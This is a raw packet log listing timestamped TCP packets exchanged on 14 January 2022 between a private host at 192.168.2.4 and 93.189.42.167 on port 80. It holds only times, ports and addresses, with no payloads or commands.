Jan 14, 2022 00:16:07.365647078 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365659952 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365663052 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365683079 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365690947 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365708113 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365717888 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365730047 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365751028 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365755081 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365772009 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365786076 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365793943 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365816116 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365818977 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365837097 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365850925 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365863085 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365874052 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365895987 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365909100 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365919113 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365940094 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365947962 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365958929 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365962029 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.365964890 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.365984917 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366004944 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366010904 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366019011 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366027117 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366048098 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366070032 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366091013 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366112947 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366133928 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366133928 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366153955 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366166115 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366172075 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366177082 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366177082 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366180897 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366200924 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366223097 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366245031 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366265059 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366286039 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366307020 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366327047 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366321087 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366364956 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366388083 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366410971 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366417885 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366420031 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366439104 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366461992 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366482019 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366456032 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366503000 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366524935 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366544008 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366564989 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366571903 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366586924 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366588116 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366595030 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366600990 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366605997 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366607904 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366611004 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366616964 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366621971 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366626978 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366630077 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366632938 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366638899 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366642952 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366647959 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366652012 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366652012 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366657972 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366673946 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366693974 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366700888 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366715908 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366734982 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366744041 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366753101 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366758108 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366760015 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366767883 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366779089 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366789103 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366801023 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366821051 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366830111 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366842031 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366843939 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366851091 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366864920 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366868019 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366887093 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366889954 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366900921 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366909027 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366930008 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366942883 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366950989 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366971970 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.366977930 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.366992950 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367003918 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367014885 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367037058 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367055893 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367058039 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367069006 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367080927 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367091894 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367103100 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367122889 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367131948 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367144108 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367145061 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367165089 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367186069 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367192030 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367207050 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367217064 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367228985 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367249012 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367257118 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367271900 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367275000 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367292881 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367316008 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367332935 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367336988 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367357969 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367364883 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367379904 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367391109 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367402077 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367423058 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367428064 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367444038 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367453098 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367465019 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367485046 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367486000 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367508888 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367518902 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367532015 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367542028 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367553949 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367563963 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367575884 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367582083 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367598057 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367600918 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367619991 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367626905 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367639065 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367640972 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367662907 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367664099 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367686033 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367695093 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367706060 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367707968 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367727995 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.367738962 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367754936 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.367774010 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.420135975 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.420193911 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.420253992 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.420274019 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.420310020 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.420358896 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.420409918 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.420448065 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.420460939 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.420510054 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.420527935 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.420562029 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.420610905 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.420612097 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.420665026 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.420713902 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.420717001 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.420773983 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.420814991 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.420859098 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.420865059 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.420919895 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.420921087 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.420974016 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.421024084 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.421073914 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.421075106 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.421125889 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.421176910 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.421183109 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.421231031 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.421245098 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.421279907 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.421330929 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.421386003 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.421386003 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.421435118 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.421482086 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.421484947 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.421535015 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.421560049 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.421586037 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.421637058 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.421684027 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.421699047 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.421736002 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.421785116 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.421785116 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.421834946 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.421884060 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.421931982 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.421983957 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.422029972 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.422032118 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.422080994 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.422085047 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.422131062 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.422179937 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.422193050 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.422230005 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.422278881 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.422326088 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.422332048 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.422377110 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.422425985 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.422429085 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.422477007 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.422481060 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.422532082 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.422580004 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.422584057 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.422630072 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.422679901 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.422679901 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.422730923 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.422780037 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.422780991 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.422831059 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.422878027 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.422925949 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.422926903 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.422977924 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.423027992 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.423028946 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.423077106 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.423079014 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.423129082 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.423185110 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.423197031 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.423237085 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.423285961 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.423285961 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.423336983 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.423384905 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.423433065 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.423433065 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.423485041 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.423532963 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.423535109 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.423590899 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.423641920 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.423644066 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.423690081 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.423691034 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.423741102 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.423789024 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.423789978 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.423839092 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.423887968 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.423890114 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.423938036 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.423985958 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.424035072 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.424036980 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.424055099 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.424079895 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.424083948 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.424138069 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.424186945 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.424236059 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.424237967 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.424288034 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.424335957 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.424349070 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.424385071 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.424386978 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.424438953 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.424490929 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.424885988 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.425967932 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.476387024 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.476421118 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.476449966 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.476475000 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.476505995 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.476510048 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.476517916 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.476537943 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.476546049 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.476562023 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.476568937 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.476593018 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.476615906 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.476615906 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.476643085 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.476663113 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.476669073 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.476694107 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.476707935 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.476717949 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.476741076 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.476779938 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.477133989 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.477243900 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.477253914 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.477279902 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.477313995 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.477330923 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.477335930 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.477360964 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.477384090 CET	80	49899	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:07.477385044 CET	49899	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:07.477407932 CET	80	49899	93.189.42.167	192.168.2.4
